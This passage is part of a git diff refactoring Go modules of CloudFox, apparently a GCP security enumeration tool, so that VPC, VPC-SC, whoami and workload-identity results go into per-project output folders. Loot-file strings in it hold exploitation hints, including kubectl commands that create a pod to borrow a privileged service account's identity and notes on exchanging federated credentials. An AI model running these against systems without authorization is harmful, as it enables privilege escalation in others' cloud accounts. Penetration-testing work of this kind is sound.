- Name: "vpc-peerings", - Header: peerHeader, - Body: peerBody, + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } + body = append(body, []string{ + m.GetProjectName(peering.ProjectID), + peering.ProjectID, + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + exportRoutes, + importRoutes, }) } + return body +} - // Routes table (custom routes only, skip default) - var customRoutes []vpcservice.RouteInfo - for _, route := range m.Routes { - if !strings.HasPrefix(route.Name, "default-route-") { - customRoutes = append(customRoutes, route) +func (m *VPCNetworksModule) routesToTableBody(routes []vpcservice.RouteInfo) [][]string { + var body [][]string + // Filter to custom routes only + for _, route := range routes { + if strings.HasPrefix(route.Name, "default-route-") { + continue } + body = append(body, []string{ + m.GetProjectName(route.ProjectID), + route.ProjectID, + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + }) + } + return body +} + +func (m *VPCNetworksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + } + + if peerings, ok := m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) } - if len(customRoutes) > 0 { - routeHeader := []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} - var routeBody [][]string - for _, route := range customRoutes { - routeBody = append(routeBody, []string{ - m.GetProjectName(route.ProjectID), - route.ProjectID, - route.Name, - route.Network, - route.DestRange, - route.NextHopType, - route.NextHop, - fmt.Sprintf("%d", route.Priority), + + if routes, ok := m.ProjectRoutes[projectID]; ok && len(routes) > 0 { + routeBody := m.routesToTableBody(routes) + if len(routeBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "custom-routes", + Header: m.getRoutesHeader(), + Body: routeBody, }) } + } + + return tableFiles +} + +func (m *VPCNetworksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRoutes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = VPCNetworksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} + +func (m *VPCNetworksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) + } + + if len(allSubnets) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), + }) + } + + if len(allPeerings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), + }) + } + + routeBody := m.routesToTableBody(allRoutes) + if len(routeBody) > 0 { tables = append(tables, internal.TableFile{ Name: "custom-routes", - Header: routeHeader, + Header: m.getRoutesHeader(), Body: routeBody, }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go index 5e4717d5..36a17bc1 100644 --- a/gcp/commands/vpcsc.go +++ b/gcp/commands/vpcsc.go @@ -232,6 +232,14 @@ func (m *VPCSCModule) addAllToLoot() { } func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *VPCSCModule) buildTables() []internal.TableFile { var tables []internal.TableFile // Access Policies table @@ -325,12 +333,61 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { }) } + return tables +} + +func (m *VPCSCModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} + +func (m *VPCSCModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := VPCSCOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if m.OrgID != "" { + orgID = m.OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCSC_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *VPCSCModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() output := VPCSCOutput{Table: tables, Loot: lootFiles} diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index c8a2fd83..728ca7a1 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -817,6 +817,15 @@ func (m *WhoAmIModule) generateLoot() { // Output Generation // ------------------------------ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Determine output mode based on hierarchy availability + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *WhoAmIModule) buildTables() []internal.TableFile { // Identity table identityHeader := []string{ "Property", @@ -1047,13 +1056,62 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) } } - // Collect loot files + return tables +} + +func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} + +func (m *WhoAmIModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For whoami, output at org level since it's account-level data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *WhoAmIModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() output := WhoAmIOutput{ Table: tables, diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index 7f5a3c73..e537cf8f 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -68,17 +68,14 @@ type ClusterWorkloadIdentity struct { type WorkloadIdentityModule struct { gcpinternal.BaseGCPModule - // Module-specific fields (GKE Workload Identity) - Clusters []ClusterWorkloadIdentity - Bindings []WorkloadIdentityBinding - - // Workload Identity Federation fields - Pools []workloadidentityservice.WorkloadIdentityPool - Providers []workloadidentityservice.WorkloadIdentityProvider - FederatedBindings []workloadidentityservice.FederatedIdentityBinding - - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields (GKE Workload Identity) - per-project for hierarchical output + ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters + ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings + ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools + ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers + ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -104,18 +101,15 @@ func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { // Create module instance module := &WorkloadIdentityModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Clusters: []ClusterWorkloadIdentity{}, - Bindings: []WorkloadIdentityBinding{}, - Pools: []workloadidentityservice.WorkloadIdentityPool{}, - Providers: []workloadidentityservice.WorkloadIdentityProvider{}, - FederatedBindings: []workloadidentityservice.FederatedIdentityBinding{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]ClusterWorkloadIdentity), + ProjectBindings: make(map[string][]WorkloadIdentityBinding), + ProjectPools: make(map[string][]workloadidentityservice.WorkloadIdentityPool), + ProjectProviders: make(map[string][]workloadidentityservice.WorkloadIdentityProvider), + ProjectFederatedBindings: make(map[string][]workloadidentityservice.FederatedIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -127,9 +121,16 @@ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Lo // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + // Get all data for stats + allClusters := m.getAllClusters() + allBindings := m.getAllBindings() + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + // Check if we have any findings - hasGKE := len(m.Clusters) > 0 - hasFederation := len(m.Pools) > 0 + hasGKE := len(allClusters) > 0 + hasFederation := len(allPools) > 0 if !hasGKE && !hasFederation { logger.InfoM("No Workload Identity configurations found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) @@ -139,25 +140,70 @@ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Lo // Count GKE clusters with Workload Identity if hasGKE { wiEnabled := 0 - for _, c := range m.Clusters { + for _, c := range allClusters { if c.WorkloadPoolEnabled { wiEnabled++ } } logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", - len(m.Clusters), wiEnabled, len(m.Bindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + len(allClusters), wiEnabled, len(allBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } // Count federation findings if hasFederation { logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", - len(m.Pools), len(m.Providers), len(m.FederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + len(allPools), len(allProviders), len(allFederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } // Write output m.writeOutput(ctx, logger) } +// getAllClusters returns all clusters from all projects (for statistics) +func (m *WorkloadIdentityModule) getAllClusters() []ClusterWorkloadIdentity { + var all []ClusterWorkloadIdentity + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllBindings returns all bindings from all projects (for statistics) +func (m *WorkloadIdentityModule) getAllBindings() []WorkloadIdentityBinding { + var all []WorkloadIdentityBinding + for _, bindings := range m.ProjectBindings { + all = append(all, bindings...) + } + return all +} + +// getAllPools returns all pools from all projects (for statistics) +func (m *WorkloadIdentityModule) getAllPools() []workloadidentityservice.WorkloadIdentityPool { + var all []workloadidentityservice.WorkloadIdentityPool + for _, pools := range m.ProjectPools { + all = append(all, pools...) + } + return all +} + +// getAllProviders returns all providers from all projects (for statistics) +func (m *WorkloadIdentityModule) getAllProviders() []workloadidentityservice.WorkloadIdentityProvider { + var all []workloadidentityservice.WorkloadIdentityProvider + for _, providers := range m.ProjectProviders { + all = append(all, providers...) + } + return all +} + +// getAllFederatedBindings returns all federated bindings from all projects (for statistics) +func (m *WorkloadIdentityModule) getAllFederatedBindings() []workloadidentityservice.FederatedIdentityBinding { + var all []workloadidentityservice.FederatedIdentityBinding + for _, bindings := range m.ProjectFederatedBindings { + all = append(all, bindings...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -243,27 +289,36 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s // Thread-safe append m.mu.Lock() - m.Clusters = append(m.Clusters, clusterInfos...) - m.Bindings = append(m.Bindings, bindings...) - m.Pools = append(m.Pools, pools...) - m.Providers = append(m.Providers, providers...) - m.FederatedBindings = append(m.FederatedBindings, fedBindings...) + m.ProjectClusters[projectID] = clusterInfos + m.ProjectBindings[projectID] = bindings + m.ProjectPools[projectID] = pools + m.ProjectProviders[projectID] = providers + m.ProjectFederatedBindings[projectID] = fedBindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for _, cwi := range clusterInfos { - m.addClusterToLoot(cwi) + m.addClusterToLoot(projectID, cwi) } for _, binding := range bindings { - m.addBindingToLoot(binding) + m.addBindingToLoot(projectID, binding) } for _, pool := range pools { - m.addPoolToLoot(pool) + m.addPoolToLoot(projectID, pool) } for _, provider := range providers { - m.addProviderToLoot(provider) + m.addProviderToLoot(projectID, provider) } for _, fedBinding := range fedBindings { - m.addFederatedBindingToLoot(fedBinding) + m.addFederatedBindingToLoot(projectID, fedBinding) } m.mu.Unlock() @@ -400,16 +455,13 @@ func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { // ------------------------------ // Loot File Management // ------------------------------ -func (m *WorkloadIdentityModule) initializeLootFiles() { - m.LootMap["workloadidentity-commands"] = &internal.LootFile{ - Name: "workloadidentity-commands", - Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *WorkloadIdentityModule) addClusterToLoot(projectID string, cwi ClusterWorkloadIdentity) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return } -} - -func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { if cwi.WorkloadPoolEnabled { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# GKE CLUSTER: %s\n"+ "# ==========================================\n"+ @@ -432,13 +484,17 @@ func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { } } -func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBinding) { +func (m *WorkloadIdentityModule) addBindingToLoot(projectID string, binding WorkloadIdentityBinding) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } highPriv := "" if binding.IsHighPrivilege { highPriv = " [HIGH PRIVILEGE]" } - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# K8s SA BINDING: %s/%s -> %s%s\n"+ "# ------------------------------------------\n"+ @@ -454,13 +510,13 @@ func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBindin ) if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# GCP SA Roles: %s\n", strings.Join(binding.GCPSARoles, ", "), ) } - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# To exploit, create pod with this service account:\n"+ "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", @@ -470,12 +526,16 @@ func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBindin ) } -func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.WorkloadIdentityPool) { +func (m *WorkloadIdentityModule) addPoolToLoot(projectID string, pool workloadidentityservice.WorkloadIdentityPool) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } status := "Active" if pool.Disabled { status = "Disabled" } - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ "# FEDERATION POOL: %s\n"+ "# ==========================================\n"+ @@ -497,8 +557,12 @@ func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.Work ) } -func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityservice.WorkloadIdentityProvider) { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( +func (m *WorkloadIdentityModule) addProviderToLoot(projectID string, provider workloadidentityservice.WorkloadIdentityProvider) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# PROVIDER: %s/%s (%s)\n"+ "# ------------------------------------------\n"+ @@ -509,21 +573,21 @@ func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityserv ) if provider.ProviderType == "AWS" { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# AWS Account: %s\n", provider.AWSAccountID) } else if provider.ProviderType == "OIDC" { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) } if provider.AttributeCondition != "" { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Attribute Condition: %s\n", provider.AttributeCondition) } else { - m.LootMap["workloadidentity-commands"].Contents += "# Attribute Condition: NONE\n" + lootFile.Contents += "# Attribute Condition: NONE\n" } - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe provider:\n"+ "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", provider.ProviderID, provider.PoolID, provider.ProjectID, @@ -532,7 +596,7 @@ func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityserv // Add exploitation guidance based on provider type switch provider.ProviderType { case "AWS": - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# From AWS account %s, exchange credentials:\n"+ "# gcloud iam workload-identity-pools create-cred-config \\\n"+ "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ @@ -542,7 +606,7 @@ func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityserv ) case "OIDC": if strings.Contains(provider.OIDCIssuerURI, "github") { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# From GitHub Actions workflow, add:\n"+ "# permissions:\n"+ "# id-token: write\n"+ @@ -558,8 +622,12 @@ func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityserv } } -func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadidentityservice.FederatedIdentityBinding) { - m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( +func (m *WorkloadIdentityModule) addFederatedBindingToLoot(projectID string, binding workloadidentityservice.FederatedIdentityBinding) { + lootFile := m.LootMap[projectID]["workloadidentity-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# ------------------------------------------\n"+ "# FEDERATED BINDING\n"+ "# ------------------------------------------\n"+ @@ -578,6 +646,127 @@ func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadident // Output Generation // ------------------------------ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *WorkloadIdentityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID := range m.ProjectClusters { + tables := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = WorkloadIdentityOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *WorkloadIdentityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + allBindings := m.getAllBindings() + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + tables := m.buildTables(allClusters, allBindings, allPools, allProviders, allFederatedBindings) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") + } +} + +// buildTablesForProject builds tables for a specific project +func (m *WorkloadIdentityModule) buildTablesForProject(projectID string) []internal.TableFile { + clusters := m.ProjectClusters[projectID] + bindings := m.ProjectBindings[projectID] + pools := m.ProjectPools[projectID] + providers := m.ProjectProviders[projectID] + federatedBindings := m.ProjectFederatedBindings[projectID] + + return m.buildTables(clusters, bindings, pools, providers, federatedBindings) +} + +// buildTables builds all tables from the given data +func (m *WorkloadIdentityModule) buildTables( + clusters []ClusterWorkloadIdentity, + bindings []WorkloadIdentityBinding, + pools []workloadidentityservice.WorkloadIdentityPool, + providers []workloadidentityservice.WorkloadIdentityProvider, + federatedBindings []workloadidentityservice.FederatedIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + // Clusters table clustersHeader := []string{ "Project Name", @@ -590,7 +779,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } var clustersBody [][]string - for _, cwi := range m.Clusters { + for _, cwi := range clusters { wiEnabled := "No" if cwi.WorkloadPoolEnabled { wiEnabled = "Yes" @@ -611,6 +800,15 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna }) } + // Only add clusters table if there are clusters + if len(clustersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }) + } + // Bindings table bindingsHeader := []string{ "Project Name", @@ -623,7 +821,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } var bindingsBody [][]string - for _, binding := range m.Bindings { + for _, binding := range bindings { highPriv := "No" if binding.IsHighPrivilege { highPriv = "Yes" @@ -640,23 +838,6 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna }) } - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "workload-identity-clusters", - Header: clustersHeader, - Body: clustersBody, - }, - } - // Add bindings table if there are any if len(bindingsBody) > 0 { tables = append(tables, internal.TableFile{ @@ -671,7 +852,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna // ============================ // Federation Pools table - if len(m.Pools) > 0 { + if len(pools) > 0 { poolsHeader := []string{ "Project Name", "Project ID", @@ -682,7 +863,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } var poolsBody [][]string - for _, pool := range m.Pools { + for _, pool := range pools { disabled := "No" if pool.Disabled { disabled = "Yes" @@ -705,7 +886,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } // Federation Providers table - if len(m.Providers) > 0 { + if len(providers) > 0 { providersHeader := []string{ "Project Name", "Project ID", @@ -717,7 +898,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } var providersBody [][]string - for _, p := range m.Providers { + for _, p := range providers { issuerOrAccount := "-" if p.ProviderType == "AWS" { issuerOrAccount = p.AWSAccountID @@ -749,7 +930,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } // Federated bindings table - if len(m.FederatedBindings) > 0 { + if len(federatedBindings) > 0 { fedBindingsHeader := []string{ "Project Name", "Project ID", @@ -759,7 +940,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } var fedBindingsBody [][]string - for _, fb := range m.FederatedBindings { + for _, fb := range federatedBindings { fedBindingsBody = append(fedBindingsBody, []string{ m.GetProjectName(fb.ProjectID), fb.ProjectID, @@ -776,31 +957,5 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna }) } - output := WorkloadIdentityOutput{ - Table: tables, - Loot: lootFiles, - } - - // Write output using HandleOutputSmart with scope support - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, 